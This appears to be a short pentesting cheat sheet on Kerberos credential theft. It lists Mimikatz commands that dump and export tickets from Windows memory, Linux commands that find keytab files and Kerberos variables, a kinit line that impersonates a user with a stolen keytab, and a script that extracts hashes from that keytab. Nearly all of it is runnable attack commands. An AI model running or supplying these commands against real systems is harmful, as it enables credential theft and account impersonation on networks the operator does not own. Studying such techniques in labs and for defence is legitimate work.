Mimikatz
privilege::debug
sekurlsa::tickets /export
Kerberos Linux
printenv | grep krb5
or
env | grep -i krb5
realm list
check if domain joined
ps -ef | grep -i “winbind\|sssd”
Finding Kerneros Tickets
find / -name *keytab* -ls 2>/dev/null
check crontab -l
also
klist -k -t
impersonating kinit [email protected] -k -t /opt/specialfiles/carlos.keytab
extracting
python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab